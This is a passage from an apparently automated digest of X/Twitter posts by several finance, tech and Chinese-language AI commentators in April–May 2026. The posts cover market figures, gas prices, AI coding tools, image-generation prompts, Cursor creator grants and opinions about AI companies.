ATL\n[原文链接](https://x.com/jason/status/2049976123891552679)\n\n**[2026-04-30T22:15:21+00:00]**\n> Real life! With Jose! @AlvaradoJose15\n[原文链接](https://x.com/jason/status/2049975924238569627)\n\n**[2026-04-30T21:33:17+00:00]**\n> Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). For UberX? Sure, they would need to be convinced. in a world moving to autonomy, the opportun…\n[原文链接](https://x.com/jason/status/2049965338368819443)\n\n**[2026-04-30T21:30:21+00:00]**\n> Who made this?!\n[原文链接](https://x.com/jason/status/2049964597403140486)\n\n**[2026-04-30T21:27:00+00:00]**\n> San Francisco politicians and their constituents enable this suffering. They are the cause of it, because they can stop it instantly. Today, tomorrow and every one of the last 1,000 days this has hap…\n[原文链接](https://x.com/jason/status/2049963757036536190)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(19 条)\n\n**[2026-05-01T17:18:23+00:00]**\n> Last 10 Years NVIDIA $NVDA: +22,875% Bitcoin $BTC: +17,205% $AMD: +10,030% Tesla $TSLA: +2,362% Apple $AAPL: +1,233% Google $GOOGL: +999% Netflix $NFLX: +932% Microsoft $MSFT: +844% Amazon $AMZN: +71…\n[原文链接](https://x.com/charliebilello/status/2050263578188333549)\n\n**[2026-05-01T17:03:07+00:00]**\n> #FF @PeterMallouk, a great follow!\n[原文链接](https://x.com/charliebilello/status/2050259734930800740)\n\n**[2026-05-01T13:48:51+00:00]**\n> The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.\n[原文链接](https://x.com/charliebilello/status/2050210847650132146)\n\n**[2026-05-01T13:21:35+00:00]**\n> The S&P 500 hit its 11th all-time high of the year yesterday. Video: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s\n[原文链接](https://x.com/charliebilello/status/2050203982388142245)\n\n**[2026-05-01T13:04:00+00:00]**\n> RT by @charliebilello: The market isn’t red or blue - it’s green. It doesn’t care about politics. It runs on earnings, innovation, and growth.\n[原文链接](https://x.com/charliebilello/status/2050199558995738866)\n\n**[2026-05-01T12:56:38+00:00]**\n> Since the start of the Iran war... Jet Fuel: +80% Sulfur: +68% Heating Oil: +56% WTI Crude Oil: +55% Brent Crude Oil: +52% Diesel: +48% Gasoline: +47% Urea: +47% European Nat Gas: +44% Fertilizer: +2…\n[原文链接](https://x.com/charliebilello/status/2050197704941158556)\n\n**[2026-05-01T12:50:39+00:00]**\n> Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 3…\n[原文链接](https://x.com/charliebilello/status/2050196201014718675)\n\n**[2026-04-30T21:51:45+00:00]**\n> Q1 Revenue Growth, YoY % Change... Meta $META: +33% Google $GOOGL: +22% Microsoft $MSFT: +18% Apple $AAPL: +17% Amazon $AMZN: +17% Netflix $NFLX: +16% Tesla $TSLA: +16% S&P 500 $SPY: +10%\n[原文链接](https://x.com/charliebilello/status/2049969984432914819)\n\n**[2026-04-30T21:16:00+00:00]**\n> RT by @charliebilello: Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased …\n[原文链接](https://x.com/charliebilello/status/2049960986468069507)\n\n**[2026-04-30T20:57:41+00:00]**\n> RT by @charliebilello: Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN https://bilello.blog/newsletter\n[原文链接](https://x.com/charliebilello/status/2049956378660200794)\n\n**[2026-04-30T20:47:59+00:00]**\n> RT by @charliebilello: Amazon Revenue (Billions) 2026 (est): 810 2025: 717 2024: 638 2023: 575 2022: 514 2021: 470 2020: 386 2019: 281 2018: 233 2017: 178 2016: 136 2015: 107 2014: 89 2013: 74 2012: …\n[原文链接](https://x.com/charliebilello/status/2049953936212217973)\n\n**[2026-04-30T20:35:03+00:00]**\n> RT by @charliebilello: Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company histor…\n[原文链接](https://x.com/charliebilello/status/2049950680236827140)\n\n**[2026-04-30T18:34:04+00:00]**\n> RT by @charliebilello: Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).\n[原文链接](https://x.com/charliebilello/status/2049920236002963504)\n\n**[2026-04-30T18:08:56+00:00]**\n> RT by @charliebilello: The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX\n[原文链接](https://x.com/charliebilello/status/2049913908861792603)\n\n**[2026-04-30T16:02:50+00:00]**\n> RT by @charliebilello: Microsoft Revenues (Billions)... 2026 (est): 354 '25: 305 '24: 262 '23: 228 '22: 203 '21: 185 '20: 153 '19: 134 '18: 118 '17: 102 '16: 95 '15: 88 '14: 93 '13: 83 '12: 73 '11: 7…\n[原文链接](https://x.com/charliebilello/status/2049882175433015544)\n\n**[2026-04-30T15:54:48+00:00]**\n> RT by @charliebilello: Google Revenues (Billions)... 2026 (est): 476 2025: 403 2024: 350 2023: 307 2022: 283 2021: 258 2020: 183 2019: 162 2018: 137 2017: 111 2016: 90 2015: 75 2014: 66 2013: 56 2012…\n[原文链接](https://x.com/charliebilello/status/2049880154629878151)\n\n**[2026-04-30T13:24:05+00:00]**\n> RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...\n[原文链接](https://x.com/charliebilello/status/2049842225970852313)\n\n**[2026-04-30T13:08:14+00:00]**\n> RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% ta…\n[原文链接](https://x.com/charliebilello/status/2049838235866566668)\n\n**[2026-04-30T13:01:56+00:00]**\n> RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest w…\n[原文链接](https://x.com/charliebilello/status/2049836652181307421)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-30T11:57:24+00:00]**\n> Crypto's current state is a bit shit 1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable 2. The …\n[原文链接](https://x.com/CryptoCred/status/2049820412754694460)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ✅ @svwang1 — 王川(硅谷)(8 条)\n\n**[2026-05-01T15:31:23+00:00]**\n> 不要和别人竞争。让他们变得无关紧要。 你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。 在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。\n[原文链接](https://x.com/svwang1/status/2050236650329186525)\n\n**[2026-05-01T15:21:59+00:00]**\n> 不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。\n[原文链接](https://x.com/svwang1/status/2050234282208317919)\n\n**[2026-04-30T18:43:10+00:00]**\n> R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。\n[原文链接](https://x.com/svwang1/status/2049922524839018604)\n\n**[2026-04-30T18:36:57+00:00]**\n> 按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。 李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。\n[原文链接](https://x.com/svwang1/status/2049920960724427165)\n\n**[2026-04-30T03:56:04+00:00]**\n> Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。\n[原文链接](https://x.com/svwang1/status/2049699281616228816)\n\n**[2026-04-29T00:48:58+00:00]**\n> 旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。 和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。\n[原文链接](https://x.com/svwang1/status/2049289806241550791)\n\n**[2026-04-28T22:20:52+00:00]**\n> 人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。\n[原文链接](https://x.com/svwang1/status/2049252535689757003)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n---\n\n### ✅ @bozhou_ai — 泊舟(20 条)\n\n**[2026-05-01T07:46:06+00:00]**\n> Dragoncode群友也分享了一下设计的聚合站,我目前做的产品都是在这里面直接拿设计风格 https://getdesign.md\n[原文链接](https://x.com/bozhou_ai/status/2050119556644171998)\n\n**[2026-05-01T05:57:01+00:00]**\n> 目前已经有4位伙伴提交了作品,挺有意思的,都是一些小工具,估计就一两个小时就完成了\n[原文链接](https://x.com/bozhou_ai/status/2050092103565496369)\n\n**[2026-04-30T08:40:01+00:00]**\n> Pinned: 五一做点不一样的。 我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇 主题很简单: 用 AI 解决一个每天浪费 10 分钟的小问题 不用炫技,不用大项目 能用、有效、有感觉就行 3 个赛道: 赛道一:省时间 把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。 赛道二:省脑力 帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评…\n[原文链接](https://x.com/bozhou_ai/status/2049770737175789619)\n\n**[2026-04-30T05:25:46+00:00]**\n> 月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂 主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了 目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀\n[原文链接](https://x.com/bozhou_ai/status/2049721852420108329)\n\n**[2026-04-30T01:29:33+00:00]**\n> 我还有十二万积分没用\n[原文链接](https://x.com/bozhou_ai/status/2049662409263272136)\n\n**[2026-04-29T10:33:21+00:00]**\n> Warp 昨晚开源了。 GitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。 Warp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。 几个观察: 第一,…\n[原文链接](https://x.com/bozhou_ai/status/2049436870963085429)\n\n**[2026-04-29T10:32:33+00:00]**\n> MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。 cyrilXBT 整理的清单,分四类。 【基础】 1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法 https://cs.nyu.edu/~mohri/mlbook/ 2. Mathematics for Mach…\n[原文链接](https://x.com/bozhou_ai/status/2049436668663390575)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal …\n[原文链接](https://x.com/bozhou_ai/status/2049042369530777747)\n\n**[2026-04-28T07:51:43+00:00]**\n> memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的\n[原文链接](https://x.com/bozhou_ai/status/2049033808629129504)\n\n**[2026-04-28T07:04:22+00:00]**\n> x.com/i/article/204902020458…\n[原文链接](https://x.com/bozhou_ai/status/2049021892208521544)\n\n**[2026-04-28T00:26:49+00:00]**\n> 我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多\n[原文链接](https://x.com/bozhou_ai/status/2048921844175212590)\n\n**[2026-04-27T07:19:46+00:00]**\n> 我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好 现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了\n[原文链接](https://x.com/bozhou_ai/status/2048663377598452202)\n\n**[2026-04-27T05:49:10+00:00]**\n> RT by @bozhou_ai: 中文AI必关注12位高价值博主 AI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。 我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。 1. 摸鱼巨匠 @SunNeverSetsX AI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强 …\n[原文链接](https://x.com/bozhou_ai/status/2048640580004335669)\n\n**[2026-04-27T03:22:54+00:00]**\n> 之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。 一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。 它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广: AI 端:Claude Code…\n[原文链接](https://x.com/bozhou_ai/status/2048603768250585231)\n\n**[2026-04-27T01:15:43+00:00]**\n> 人生第一次录播客,我们和cell老师一起聊聊中转站的那些事\n[原文链接](https://x.com/bozhou_ai/status/2048571760698949641)\n\n**[2026-04-26T13:15:51+00:00]**\n> RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》 @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。 2. 0xAA @0xAA_Science 北…\n[原文链接](https://x.com/bozhou_ai/status/2048390603030032670)\n\n**[2026-04-26T13:00:17+00:00]**\n> GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵\n[原文链接](https://x.com/bozhou_ai/status/2048386685399142532)\n\n**[2026-04-25T09:18:55+00:00]**\n> RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了! 这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。 现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博…\n[原文链接](https://x.com/bozhou_ai/status/2047968587902820543)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/20477384398237330…\n[原文链接](https://x.com/bozhou_ai/status/2047891848908472433)\n\n**[2026-04-25T01:17:42+00:00]**\n> Cursor大善人,我也已经领到了,在X上获得的最大一笔收入\n[原文链接](https://x.com/bozhou_ai/status/2047847486430286317)\n\n---\n\n### ✅ @lxfater — 铁锤人(20 条)\n\n**[2026-05-01T15:47:13+00:00]**\n> Apple Support App发布打包进了Claude.md 文件 看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈\n[原文链接](https://x.com/lxfater/status/2050240636020732015)\n\n**[2026-05-01T12:21:36+00:00]**\n> 身体脆弱就会造成精神脆弱 精神脆弱就会导致效率低下\n[原文链接](https://x.com/lxfater/status/2050188888744804410)\n\n**[2026-04-30T17:01:35+00:00]**\n> GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos 没差这么多呀😂\n[原文链接](https://x.com/lxfater/status/2049896961382203667)\n\n**[2026-04-30T10:21:24+00:00]**\n> Claude code 对 OpenClaw的封杀已经丧心病狂了 最近,Theo(32 万粉的硅谷科技 YouTuber) 发现: 如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费 现在Anthropic已经疯狂在毁开发者好感了 这种表里不一不是第一次了哈 之前 Claude Code 负责人 Boris Cherny,在…\n[原文链接](https://x.com/lxfater/status/2049796253471453564)\n\n**[2026-04-30T09:26:25+00:00]**\n> 说一下我是如何用AI工具的: Xai的Gork的搜索能力很强的,我经常使用来做搜索。 Cluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。 而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。\n[原文链接](https://x.com/lxfater/status/2049782414323388714)\n\n**[2026-04-30T07:34:19+00:00]**\n> 嘿嘿,有意思\n[原文链接](https://x.com/lxfater/status/2049754205641170992)\n\n**[2026-04-30T06:26:14+00:00]**\n> 如何用AI让美女联系任意瑜伽姿势呢? 下面一张图教你学会,更详细步骤在引用帖子里\n[原文链接](https://x.com/lxfater/status/2049737071300939914)\n\n**[2026-04-30T06:09:38+00:00]**\n> 快10w粉丝了,其实想发点总结的 但是我发现粉丝越多,自己的建议对别人就越没有用 在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样 以后多发点 适合普通人学习的 AI 小技巧好了🤗\n[原文链接](https://x.com/lxfater/status/2049732891937276350)\n\n**[2026-04-30T02:38:37+00:00]**\n> 醒来了,并没有😅\n[原文链接](https://x.com/lxfater/status/2049679788126912824)\n\n**[2026-04-29T14:50:44+00:00]**\n> 睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?\n[原文链接](https://x.com/lxfater/status/2049501643071180855)\n\n**[2026-04-29T06:02:06+00:00]**\n> 用 GPT Image 2 赚钱,你想到几种方式? 我整理了5种,每种都有提示词,拿走能用 但还有一种方式不用自己会出图也能赚!! 有人进货四分钱,卖两毛,自己一张图都不出 闲鱼上已经有人在跑了 其余 5 种看图 完整提示词加自动化流程,请看引用文章👇\n[原文链接](https://x.com/lxfater/status/2049368609193926810)\n\n**[2026-04-29T03:28:30+00:00]**\n> R to @lxfater: 海报图片提示词 : 请生成一张随机的瑜伽宣传海报拼贴总图。 整体要求: 在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报 每张卡面尺寸随机设计铺满整张图 卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开 整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报 每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化 所有海报统一保持高级、专业、吸引…\n[原文链接](https://x.com/lxfater/status/2049329956153352499)\n\n**[2026-04-29T03:28:29+00:00]**\n> R to @lxfater: 如何使用Agent 模式 3 步: 选图像模式 选GPT-2-image 点 Agent 按钮 利用下面给的提示词,出了分镜图和人设图 接下来,利用分镜图和人设图,我们就可以控制人物动作啦!! 如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示) 得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了 多个视频就可以出系列的瑜伽动作 flo…\n[原文链接](https://x.com/lxfater/status/2049329950495310198)\n\n**[2026-04-29T03:28:28+00:00]**\n> 做内容运营,生图生视频,你现在还在跑好几个工具吗? 被朋友拉去做瑜伽图,搭了无数工作流 GPT Image 2 出来后,发现全废了 得重新规划一套,但这几天身体不舒服,没心思搞 随手把提示词扔进 flowith 试了一下 以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。 它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整 分镜图和人物图来生成出首末两张图片,用视频模式可…\n[原文链接](https://x.com/lxfater/status/2049329944052859141)\n\n**[2026-04-29T00:05:46+00:00]**\n> 看来草莓问题和洗车问题很经典了,ChatGPT都在测试\n[原文链接](https://x.com/lxfater/status/2049278935897186512)\n\n**[2026-04-28T13:31:04+00:00]**\n> Flowith出 GPT image 的生图Agent,真快呀 我赶紧试试,看看如何!!\n[原文链接](https://x.com/lxfater/status/2049119209502670864)\n\n**[2026-04-28T07:24:37+00:00]**\n> 说得太对了👍,牛逼\n[原文链接](https://x.com/lxfater/status/2049026986442707117)\n\n**[2026-04-28T06:55:56+00:00]**\n> x.com/i/article/204837140806…\n[原文链接](https://x.com/lxfater/status/2049019768456241273)\n\n**[2026-04-28T06:15:15+00:00]**\n> R to @lxfater: 来源: [1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17 [2] https://thenextweb.com/news/opena…\n[原文链接](https://x.com/lxfater/status/2049009528595685705)\n\n**[2026-04-28T06:14:44+00:00]**\n> Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法 2015 年,OpenAI 打着非营利的旗号成立 顶级研究员冲着使命感来,不要钱只要理想 Musk 看到了,砸了 3800 万进去 监管也没把它当商业公司盯 连 Musk 这种人都信了 但 CEO 在想另一件事 Altman 从 2014 年开始,在核聚变公司 Helion 买了股 2021 年一口气砸进去 3.7…\n[原文链接](https://x.com/lxfater/status/2049009402372313341)\n\n---\n\n### ✅ @berryxia — Berryxia(19 条)\n\n**[2026-05-01T14:50:44+00:00]**\n> 比起疯传的那个风格,我自己更偏爱这个风格。 Prompt: 「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』\n[原文链接](https://x.com/berryxia/status/2050226420681757102)\n\n**[2026-05-01T14:37:39+00:00]**\n> “ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”\n[原文链接](https://x.com/berryxia/status/2050223126739665337)\n\n**[2026-05-01T14:29:58+00:00]**\n> 🚀 GameHub Evolution 正式上线! 架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞! 1. Steam Launch Boost:游戏启动速度提升数倍 2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享 3. Epic Games 原生集成:直接访问海…\n[原文链接](https://x.com/berryxia/status/2050221193752637888)\n\n**[2026-05-01T13:36:12+00:00]**\n> 破案了,应该是美团的模型😄\n[原文链接](https://x.com/berryxia/status/2050207663892627601)\n\n**[2026-05-01T04:32:27+00:00]**\n> 我艹!这一波Codex+GPT2 真是成了! 直接可以来开发游戏了,而且只是用嘴! 一句话就可以搞起来,完整教程看藏师傅的教程👇\n[原文链接](https://x.com/berryxia/status/2050070823256654283)\n\n**[2026-05-01T00:52:14+00:00]**\n> R to @berryxia: 项目地址: https://github.com/OpenGeometry-io/OpenGeometry官网体验: https://opengeometry.io/\n[原文链接](https://x.com/berryxia/status/2050015406140903487)\n\n**[2026-05-01T00:52:14+00:00]**\n> 🚀 Geometry 终于成为 AI 在建筑领域的缺失关键层! @Bootsblac 用 OpenGeometry 把 Text → Floorplans → CAD → Render 完整打通,精度控制成为可能! 1. 从文本/平面图直接生成精准 BREP CAD 模型 2. Three.js 实时渲染 + Google AI 驱动,全流程端到端 3.完整开源可用\n[原文链接](https://x.com/berryxia/status/2050015402647027808)\n\n**[2026-05-01T00:08:27+00:00]**\n> OpenRouter 又上了匿名新模型Owl Alpha! 1M 上下文,强大的工具调用能力! 猜猜他是谁家的哈哈😂\n[原文链接](https://x.com/berryxia/status/2050004383971282952)\n\n**[2026-05-01T00:00:12+00:00]**\n> 兄弟们!老马家的Grok Image终于…… Grok Image Agent 网页版Beta 版本已经上线,目前应该是给付费用户灰度推送中! 这是一款全能创意Agent,可在无限开放画布上独立创作。 Grok Agent在同一工作区内,自动完成规划→生成→编辑→迭代的全流程创作。 只需下达指令,即可观看它在无缝衔接的工作区中,自动完成规划、生成、编辑与迭代: • 🎬 “生成一部 1 分钟电影级…\n[原文链接](https://x.com/berryxia/status/2050002308759695561)\n\n**[2026-04-30T23:56:28+00:00]**\n> 这个小哥读完Anthropic关于智能体AI的博客后,我梳理出一套心智模型,用来理解并拆解智能体AI架构的设计逻辑。 设定任务与目标 明确你希望AI智能体需要完成、达成的具体事项。 1. 编排层 Orchestration layer 相当于整套系统的控制面板,负责全局调度与流程统筹。 2. 智能体层 Agents layer 由多个专用/通用智能体组成,也就是多智能体分工协作架构。 3. 工具…\n[原文链接](https://x.com/berryxia/status/2050001371307646977)\n\n**[2026-04-30T23:46:56+00:00]**\n> 刚刚看到Claude Security 现已进入公测阶段!可以让Claude 帮你检查漏洞了啊! 目前已经内置于网页版的 Claude Code 中。 只需将其指向一个代码仓库,即可获得经过验证的漏洞发现结果,并在 正在编写代码的同一位置修复它们! 这个功能挺实用,什么时候可以直接cc里可以用。 地址:https://claude.com/product/claude-security\n[原文链接](https://x.com/berryxia/status/2049998972484567491)\n\n**[2026-04-30T23:41:23+00:00]**\n> 你看看大模型有多重? 这个挺有意思的😂\n[原文链接](https://x.com/berryxia/status/2049997574229446812)\n\n**[2026-04-30T23:34:02+00:00]**\n> Claude& Blender 🐮🍺\n[原文链接](https://x.com/berryxia/status/2049995723580850235)\n\n**[2026-04-30T23:30:42+00:00]**\n> 2026年你必须了解的6个大语言模型(LLM)知识库专业术语! (大多数团队至少缺失其中3项,这会让他们的智能AI代理付出代价) 1. LLM Knowledge Base 大语言模型知识库 一种能够让大语言模型接收原始资料、整理成结构化维基文档,并通过自有索引检索来回答问题的系统。安德烈·卡尔帕西曾为自己搭建过一套。该技术的难点在于:搭建一套能适配整个团队协同使用的知识库。 2. Contin…\n[原文链接](https://x.com/berryxia/status/2049994885764419789)\n\n**[2026-04-30T23:25:26+00:00]**\n> 兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了! 直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图! Prompt:👇 1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。 2. 将全景图输入你的 Codex 以获得 3D 视图。\n[原文链接](https://x.com/berryxia/status/2049993558577619280)\n\n**[2026-04-30T23:21:37+00:00]**\n> 这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。 现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!\n[原文链接](https://x.com/berryxia/status/2049992598639755395)\n\n**[2026-04-30T23:19:35+00:00]**\n> Gemini Embedding 2 已正式发布! RAG 知识库的应用又可以支持的更好了。\n[原文链接](https://x.com/berryxia/status/2049992087547130254)\n\n**[2026-04-30T23:17:56+00:00]**\n> 苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。 不知道能搞出来个啥?\n[原文链接](https://x.com/berryxia/status/2049991672155750500)\n\n**[2026-04-30T23:16:18+00:00]**\n> 在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。 他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入 “Vibe Coding”的状态。 Karpathy 将软件开发划分为三个阶段: Software 1.0 是传统显式代码编程,Software…\n[原文链接](https://x.com/berryxia/status/2049991262934380898)\n\n---\n\n### ✅ @Pluvio9yte — 雪踏乌云(19 条)\n\n**[2026-05-01T17:15:15+00:00]**\n> Damn!确实如此,所有AI编程工具都在卷模型智能,但现在满足基本的生产力了,转而让人崩溃的根本不是模型笨,是它每次开会话都失忆😅 AGENTS.md塞不下100万token的领域知识, RAG搜不到\"未知的未知\", 我自己维护Skills维护到想吐。 在公司里,新人入职花两周pair一下就能内化领域知识。 现在跟AI协作,每个新session都是\"新人第一天\"——而且是个永远不会转正的新人。这…\n[原文链接](https://x.com/Pluvio9yte/status/2050262789256859872)\n\n**[2026-05-01T17:07:00+00:00]**\n> 说个暴论,这个一百多万阅读帖子下的评论区里说\"Claude Code杀死了我的大脑\",其实90%搞反了因果🤯🤯🤯 我自己用CC大半年,直接把省下来的执行时间全砸在了架构设计上,脑子不但没退化反而比以前转得更快 以前写代码,80%时间花在执行(查文档、写代码、修bug),20%花在设计。现在执行交给Claude或者Codex了,只有两种结果: 1. 如果把省下的时间也一起交出去,只写prompt按…\n[原文链接](https://x.com/Pluvio9yte/status/2050260712858210516)\n\n**[2026-05-01T14:30:32+00:00]**\n> Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。 这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。 以下是几个核心信息: 1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公…\n[原文链接](https://x.com/Pluvio9yte/status/2050221337424408733)\n\n**[2026-05-01T13:42:36+00:00]**\n> Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。 